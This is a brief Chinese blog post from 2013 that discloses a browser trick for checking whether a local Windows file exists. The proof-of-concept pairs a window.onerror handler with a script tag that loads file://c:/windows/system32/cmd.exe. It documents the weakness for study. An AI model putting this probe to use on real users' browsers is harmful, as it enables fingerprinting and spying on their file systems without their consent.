JavaScript Windows 系统越权判断本地文件漏洞

漏洞证明:

1 <script> window.onerror=function(){ alert('文件存在'); return true; } </script> <script src="file://c:/windows/system32/cmd.exe"></script> 

 

 

posted @ 2013-04-19 15:45  江南xd  阅读(152)  评论(0)    收藏  举报